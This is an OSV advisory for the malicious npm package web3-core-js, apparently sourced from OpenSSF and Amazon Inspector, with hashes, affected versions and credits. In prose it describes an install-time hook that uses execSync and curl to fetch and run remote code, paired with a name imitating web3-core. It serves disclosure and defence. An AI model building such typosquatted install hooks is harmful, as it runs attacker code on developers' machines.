MAL-2026-3719

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/web3-core-js/MAL-2026-3719.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-3719

Published

2026-05-13T11:51:32Z

Modified

2026-05-15T07:51:48.715022Z

Summary

Malicious code in web3-core-js (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (46f9612aaab12b9656a1f1b5fbd7684fdcd57833bbf76d14b2a243f679cb0977)

package.json declares a lifecycle hook that invokes require('child_process') and execSync with a curl command at install time. This pattern fetches remote content and executes it on the installer's machine as part of npm install, before any user code runs. The package name mimics the widely-used web3/web3-core ecosystem while shipping only a lifecycle trigger for remote execution — no library code consistent with the claimed web3 purpose is present. Running npm install web3-core-js on any developer or CI machine results in arbitrary attacker-controlled bytes being fetched and executed with the privileges of the installing user.

Source: ossf-package-analysis (44e1f40536600c94540b0fd722439856b2f118f6090709db7461f5aa06fc2fb4)

The OpenSSF Package Analysis project identified 'web3-core-js' @ 2.0.0 (npm) as malicious.

It is considered malicious because:

The package executes one or more commands associated with malicious behavior.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-13T12:10:45Z",
            "versions": [
                "2.0.0"
            ],
            "sha256": "44e1f40536600c94540b0fd722439856b2f118f6090709db7461f5aa06fc2fb4",
            "source": "ossf-package-analysis",
            "import_time": "2026-05-13T21:58:23.286634175Z"
        },
        {
            "modified_time": "2026-05-13T11:51:32Z",
            "versions": [
                "1.0.0"
            ],
            "sha256": "c0a95589cd0b99b71ac59651cbd59198745377c7812ab23b040f6cb5d8e57710",
            "source": "ossf-package-analysis",
            "import_time": "2026-05-13T21:58:23.870373359Z"
        },
        {
            "modified_time": "2026-05-14T19:25:25Z",
            "versions": [
                "1.0.0"
            ],
            "sha256": "46f9612aaab12b9656a1f1b5fbd7684fdcd57833bbf76d14b2a243f679cb0977",
            "id": "IN-MAL-2026-002722",
            "source": "amazon-inspector",
            "import_time": "2026-05-15T07:37:18.083758968Z"
        }
    ]
}

References

https://www.npmjs.com/package/web3-core-js/v/1.0.0

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com
- OpenSSF: Package Analysis - FINDER
- - https://github.com/ossf/package-analysis
  - https://openssf.slack.com/channels/package_analysis

Affected packages

npm / web3-core-js

Package

Name: web3-core-js; View open source insights on deps.dev
Purl: pkg:npm/web3-core-js

Affected ranges

Affected versions

1.*

1.0.0

2.*

2.0.0

Database specific

indicators

{
    "evidence_files": [
        {
            "sha256": "98eb7c4c2c264f51ed009e166ac42759ba3f12ae963a217346de9d542cacb24f",
            "tlsh": "faf0dc14bf105ab328c19e660a179ace5277c90b40647c58b29fa05c43dcbab14fba5a",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-LKgvmDuz75CrI7g7kNhQnYFEjVqXUoeEm7nNUeRxjsnBozTBJFsVOeZKTrNb7Zz2VTkTcD8QPkPNK30LODPEVg==",
                "sha1": "9b708127c55085dcceecd0b74d78b0fca4e3de1c"
            },
            "filename": "web3-core-js-1.0.0.tgz"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/web3-core-js/MAL-2026-3719.json"